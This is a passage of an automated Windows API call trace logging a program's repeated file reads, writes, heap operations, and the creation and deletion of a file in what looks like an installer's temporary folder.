lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.990] GetLastError () returned 0x0 [0069.990] SetLastError (dwErrCode=0x0) [0069.990] GetLastError () returned 0x0 [0069.990] SetLastError (dwErrCode=0x0) [0069.990] GetLastError () returned 0x0 [0069.990] SetLastError (dwErrCode=0x0) [0069.991] GetLastError () returned 0x0 [0069.991] SetLastError (dwErrCode=0x0) [0069.991] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.991] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.991] GetLastError () returned 0x0 [0069.991] SetLastError (dwErrCode=0x0) [0069.991] GetLastError () returned 0x0 [0069.991] SetLastError (dwErrCode=0x0) [0069.991] GetLastError () returned 0x0 [0069.991] SetLastError (dwErrCode=0x0) [0069.991] GetLastError () returned 0x0 [0069.991] SetLastError (dwErrCode=0x0) [0069.992] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.992] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.992] GetLastError () returned 0x0 [0069.992] SetLastError (dwErrCode=0x0) [0069.992] GetLastError () returned 0x0 [0069.992] SetLastError (dwErrCode=0x0) [0069.992] GetLastError () returned 0x0 [0069.992] SetLastError (dwErrCode=0x0) [0069.992] GetLastError () returned 0x0 [0069.992] SetLastError (dwErrCode=0x0) [0069.993] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.993] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.993] GetLastError () returned 0x0 [0069.993] SetLastError (dwErrCode=0x0) [0069.993] GetLastError () returned 0x0 [0069.993] SetLastError (dwErrCode=0x0) [0069.993] GetLastError () returned 0x0 [0069.993] SetLastError (dwErrCode=0x0) [0069.993] GetLastError () returned 0x0 [0069.993] SetLastError (dwErrCode=0x0) [0069.993] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.994] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.994] GetLastError () returned 0x0 [0069.994] SetLastError (dwErrCode=0x0) [0069.994] GetLastError () returned 0x0 [0069.994] SetLastError (dwErrCode=0x0) [0069.994] GetLastError () returned 0x0 [0069.994] SetLastError (dwErrCode=0x0) [0069.994] GetLastError () returned 0x0 [0069.994] SetLastError (dwErrCode=0x0) [0069.994] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.994] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.995] GetLastError () returned 0x0 [0069.995] SetLastError (dwErrCode=0x0) [0069.995] GetLastError () returned 0x0 [0069.995] SetLastError (dwErrCode=0x0) [0069.995] GetLastError () returned 0x0 [0069.995] SetLastError (dwErrCode=0x0) [0069.995] GetLastError () returned 0x0 [0069.995] SetLastError (dwErrCode=0x0) [0069.995] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.995] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.995] GetLastError () returned 0x0 [0069.995] SetLastError (dwErrCode=0x0) [0069.996] GetLastError () returned 0x0 [0069.996] SetLastError (dwErrCode=0x0) [0069.996] GetLastError () returned 0x0 [0069.996] SetLastError (dwErrCode=0x0) [0069.996] GetLastError () returned 0x0 [0069.996] SetLastError (dwErrCode=0x0) [0069.996] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.996] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.996] GetLastError () returned 0x0 [0069.996] SetLastError (dwErrCode=0x0) [0069.996] GetLastError () returned 0x0 [0069.996] SetLastError (dwErrCode=0x0) [0069.997] GetLastError () returned 0x0 [0069.997] SetLastError (dwErrCode=0x0) [0069.997] GetLastError () returned 0x0 [0069.997] SetLastError (dwErrCode=0x0) [0069.997] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.997] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.997] GetLastError () returned 0x0 [0069.997] SetLastError (dwErrCode=0x0) [0069.997] GetLastError () returned 0x0 [0069.997] SetLastError (dwErrCode=0x0) [0069.997] GetLastError () returned 0x0 [0069.998] SetLastError (dwErrCode=0x0) [0069.998] GetLastError () returned 0x0 [0069.998] SetLastError (dwErrCode=0x0) [0069.998] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.998] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.998] GetLastError () returned 0x0 [0069.998] SetLastError (dwErrCode=0x0) [0069.998] GetLastError () returned 0x0 [0069.998] SetLastError (dwErrCode=0x0) [0069.998] GetLastError () returned 0x0 [0069.998] SetLastError (dwErrCode=0x0) [0069.998] GetLastError () returned 0x0 [0069.998] SetLastError (dwErrCode=0x0) [0069.999] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.999] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.999] GetLastError () returned 0x0 [0069.999] SetLastError (dwErrCode=0x0) [0070.106] GetLastError () returned 0x0 [0070.106] SetLastError (dwErrCode=0x0) [0070.106] GetLastError () returned 0x0 [0070.106] SetLastError (dwErrCode=0x0) [0070.106] GetLastError () returned 0x0 [0070.106] SetLastError (dwErrCode=0x0) [0070.106] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.107] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.107] GetLastError () returned 0x0 [0070.107] SetLastError (dwErrCode=0x0) [0070.107] GetLastError () returned 0x0 [0070.107] SetLastError (dwErrCode=0x0) [0070.107] GetLastError () returned 0x0 [0070.107] SetLastError (dwErrCode=0x0) [0070.107] GetLastError () returned 0x0 [0070.107] SetLastError (dwErrCode=0x0) [0070.107] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.108] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.108] GetLastError () returned 0x0 [0070.108] SetLastError (dwErrCode=0x0) [0070.108] GetLastError () returned 0x0 [0070.108] SetLastError (dwErrCode=0x0) [0070.108] GetLastError () returned 0x0 [0070.108] SetLastError (dwErrCode=0x0) [0070.108] GetLastError () returned 0x0 [0070.108] SetLastError (dwErrCode=0x0) [0070.108] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.109] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.109] GetLastError () returned 0x0 [0070.109] SetLastError (dwErrCode=0x0) [0070.109] GetLastError () returned 0x0 [0070.109] SetLastError (dwErrCode=0x0) [0070.109] GetLastError () returned 0x0 [0070.109] SetLastError (dwErrCode=0x0) [0070.109] GetLastError () returned 0x0 [0070.109] SetLastError (dwErrCode=0x0) [0070.109] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.110] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.110] GetLastError () returned 0x0 [0070.110] SetLastError (dwErrCode=0x0) [0070.110] GetLastError () returned 0x0 [0070.110] SetLastError (dwErrCode=0x0) [0070.110] GetLastError () returned 0x0 [0070.110] SetLastError (dwErrCode=0x0) [0070.110] GetLastError () returned 0x0 [0070.110] SetLastError (dwErrCode=0x0) [0070.110] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.110] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.111] GetLastError () returned 0x0 [0070.111] SetLastError (dwErrCode=0x0) [0070.111] GetLastError () returned 0x0 [0070.111] SetLastError (dwErrCode=0x0) [0070.111] GetLastError () returned 0x0 [0070.111] SetLastError (dwErrCode=0x0) [0070.111] GetLastError () returned 0x0 [0070.111] SetLastError (dwErrCode=0x0) [0070.111] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.111] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.112] GetLastError () returned 0x0 [0070.112] SetLastError (dwErrCode=0x0) [0070.112] GetLastError () returned 0x0 [0070.112] SetLastError (dwErrCode=0x0) [0070.112] GetLastError () returned 0x0 [0070.112] SetLastError (dwErrCode=0x0) [0070.112] GetLastError () returned 0x0 [0070.112] SetLastError (dwErrCode=0x0) [0070.112] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.112] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.112] GetLastError () returned 0x0 [0070.112] SetLastError (dwErrCode=0x0) [0070.113] GetLastError () returned 0x0 [0070.113] SetLastError (dwErrCode=0x0) [0070.113] GetLastError () returned 0x0 [0070.113] SetLastError (dwErrCode=0x0) [0070.113] GetLastError () returned 0x0 [0070.113] SetLastError (dwErrCode=0x0) [0070.113] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0xb62, lpOverlapped=0x0) returned 1 [0070.113] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.113] GetLastError () returned 0x0 [0070.113] SetLastError (dwErrCode=0x0) [0070.113] GetLastError () returned 0x0 [0070.113] SetLastError (dwErrCode=0x0) [0070.113] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0070.114] GetLastError () returned 0x0 [0070.114] SetLastError (dwErrCode=0x0) [0070.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7cee0 [0070.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0070.114] GetLastError () returned 0x0 [0070.114] SetLastError (dwErrCode=0x0) [0070.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0070.114] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0xb70, lpOverlapped=0x0) returned 1 [0070.114] GetLastError () returned 0x0 [0070.114] SetLastError (dwErrCode=0x0) [0070.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.114] GetLastError () returned 0x0 [0070.114] SetLastError (dwErrCode=0x0) [0070.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0070.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0070.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0070.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0070.115] CloseHandle (hObject=0x428) returned 1 [0070.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0070.117] CloseHandle (hObject=0x418) returned 1 [0070.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0070.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0070.117] AreFileApisANSI () returned 1 [0070.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0070.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0070.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 45 [0070.118] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.119] GetFileType (hFile=0x418) returned 0x1 [0070.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0070.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0070.119] GetLastError () returned 0xb7 [0070.119] SetLastError (dwErrCode=0xb7) [0070.119] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0070.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0070.120] CloseHandle (hObject=0x418) returned 1 [0070.120] AreFileApisANSI () returned 1 [0070.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0070.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a98 [0070.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 45 [0070.121] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml")) returned 1 [0070.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0070.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0070.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.122] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0070.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0070.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0070.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0070.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0070.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0070.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0070.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0070.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0070.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0070.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0070.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0070.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0070.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0070.123] AreFileApisANSI () returned 1 [0070.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 